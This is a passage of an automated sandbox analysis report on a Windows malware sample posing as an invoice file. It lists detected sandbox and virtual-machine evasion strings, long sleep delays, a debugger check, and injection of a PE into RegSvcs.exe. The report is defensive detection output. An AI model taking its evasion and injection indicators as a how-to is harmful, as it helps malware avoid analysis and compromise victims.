            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\Invoice and BL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exe TID: 908Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,7_2_00403D74
            Source: C:\Users\user\Desktop\Invoice and BL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 60000Jump to behavior
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041289A LdrInitializeThunk,7_2_0041289A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040317B mov eax, dword ptr fs:[00000030h]7_2_0040317B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402B7C GetProcessHeap,RtlAllocateHeap,7_2_00402B7C
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA2008Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Users\user\Desktop\Invoice and BL.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
